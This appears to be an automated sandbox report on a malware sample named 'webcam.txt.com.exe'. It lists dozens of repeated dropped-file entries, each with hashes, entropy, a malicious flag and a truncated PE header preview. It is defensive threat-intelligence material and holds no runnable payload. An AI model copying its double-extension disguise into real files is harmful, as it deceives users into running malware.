                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
